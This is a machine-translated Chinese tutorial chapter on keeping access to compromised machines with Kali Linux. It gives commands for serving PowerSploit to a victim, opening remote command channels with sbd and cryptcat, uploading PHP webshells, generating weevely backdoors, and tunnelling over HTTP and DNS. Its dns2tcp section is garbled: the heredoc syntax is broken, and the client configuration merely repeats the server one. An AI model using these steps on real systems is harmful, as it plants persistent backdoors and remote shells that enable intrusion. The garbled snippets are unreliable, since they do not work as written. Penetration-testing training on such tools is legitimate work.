开发手册 欢迎您!
软件开发者资料库

Kali Linux - 维护访问权限

Kali Linux维护访问 - 从简单和简单的步骤学习Kali Linux,从基本到高级概念,包括安装和配置,信息收集,漏洞分析工具,无线攻击,网站渗透测试,剥削,取证,报告,压力,密码破解工具,社会工程,嗅探和欺骗,维护访问,逆向工程。

在本章中,我们将看到Kali用于维护连接和访问被黑客机器的工具,即使它再次连接和断开连接也是如此.

Powersploit

这是一款适用于Windows机器的工具.它在受害者机器上安装了PowerShell.这个工具可以帮助黑客通过PowerShell与受害者的机器连接.

要打开它,打开左侧的终端并输入以下命令进入powersploit文件夹 :

  cd/usr/share/powersploit/

如果输入"ls"它将列出您获得访问权限后可以下载并安装在受害者计算机上的所有powersploit工具.他们中的大多数是根据他们的名字自我解释的名字.

Powersploit

在受害者的机器上下载此工具的一种简单方法是创建一个Web服务器,使用以下命令可以轻松创建powersploit工具 :

  python -m SimpleHTTPServer


下载工具

在此之后,如果您输入:http://< Kali machine ip_address>:8000/以下是结果.

目录Listimg

Sbd

sbd是一个类似于Netcat的工具.它是便携式的,可以在Linux和Microsoft机器上使用. sbd具有AES-CBC-128 + HMAC-SHA1加密功能>基本上,它有助于在特定端口上随时连接受害者的机器并远程发送命令.

要打开它,请转到到终端并键入"sbd -l -p port"以使服务器接受连接.

连接接受

在这种情况下,让我们将端口44放在服务器将要监听的位置.

案例端口

在受害者的网站上,键入"sbd IPofserver port".将建立一个连接,我们可以发送远程命令.

在这种情况下,它是"localhost",因为我们在同一台机器上执行了测试.

Ipofserver

最后,在服务器上,您将看到发生了连接,如图所示以下截图.

服务器连接

Webshells

Webshell可用于维护访问或破解网站.但其中大多数是由抗病毒检测到的. C99 php shell在杀毒软件中非常有名.任何常见的防病毒软件都很容易将其检测为恶意软件.

通常,它们的主要功能是通过Web界面发送系统命令.

打开它,并在终端中输入 "cd/usr/share/webshells/" .

Webshell

如你所见,它们根据编程语言分为几类:asp,aspx,cfm,jsp,perl,php

如果你输入PHP文件夹,你可以看到php网页的所有webshell.

Folder

要将shell上传到Web服务器,例如"simple-backdoor.php"打开Web shell的网页和URL./p>

最后,编写cmd命令.您将获得所有信息,如以下屏幕截图所示.

Write Command

Weevely

Weevely是一个模拟类似telnet连接的PHP Web shell.它是一个用于Web应用程序后期利用的工具,可以用作隐形后门或Web shell来管理合法的Web帐户,甚至是免费托管的帐户.

要打开它,请转到到终端并输入"weevely",你可以看到它的用法.

Weevely

要生成shell,请键入"weevely generate password pathoffile".如下面的屏幕截图所示,它在"桌面"文件夹中生成,文件将在网络服务器上传以获取访问权限.

生成Shell

上传Web shell后,如下面的屏幕截图所示,我们可以使用命令"weevely URL password"将cmd连接到服务器你可以看到会话已经开始.

Uploading File

http-tunnel

http-tunnel创建在HTTP请求中隧道传输的双向虚拟数据流.如果需要,可以通过HTTP代理发送请求.这对于限制性防火墙后面的用户非常有用.如果允许通过HTTP代理进行WWW访问,则可以使用http-tunnel和telnet或PPP连接到防火墙外的计算机.

首先,我们应该创建一个隧道服务器以下命令 :

  httptunnel_server -h

然后,打开客户端站点类型"httptunnel_client -h"并且两者都将开始接受连接.

dns2tcp

这又是一个隧道工具,有助于通过DNS流量传递TCP流量,这意味着UDP 53端口.

要启动它,请键入"dns2tcpd".打开脚本时会解释用法.

DNSTcp

在服务器站点上,输入此命令以配置文件.

  #cat>> .dns2tcpdrc <&l; END listen = 0.0.0.0  port = 53 user = nobody  chroot =/root/dns2tcp  pid_file =/var/run/dns2tcp.pid  domain = your domain key = secretkey  resources = ssh:127.0.0.1:22  END #dns2tcpd -f .dns2tcpdrc

在客户端站点上,输入此命令.

#cat >>.dns2tcpdrc<&l;END listen = 0.0.0.0 port = 53 user=nobody chroot = /root/dns2tcp pid_file = /var/run/dns2tcp.pid domain = your domain key = secretkey resources = ssh:127.0.0.1:22 END #dns2tcpd -f .dns2tcpdrc

隧道将以此命令开始.

cryptcat

这是另一个工具像Netcat一样允许制作TCP和UD以加密方式与受害者的计算机建立连接.

要启动服务器以侦听连接,请键入以下命令 :

  cryptcat -l -p port -n


cryptcat

其中,

  • -l 代表收听连接

  • -p 代表端口号参数

  • -n 代表不做名称解析

在客户端站点上,连接命令是"cryptcat IPofServer PortofServer"

服务器端口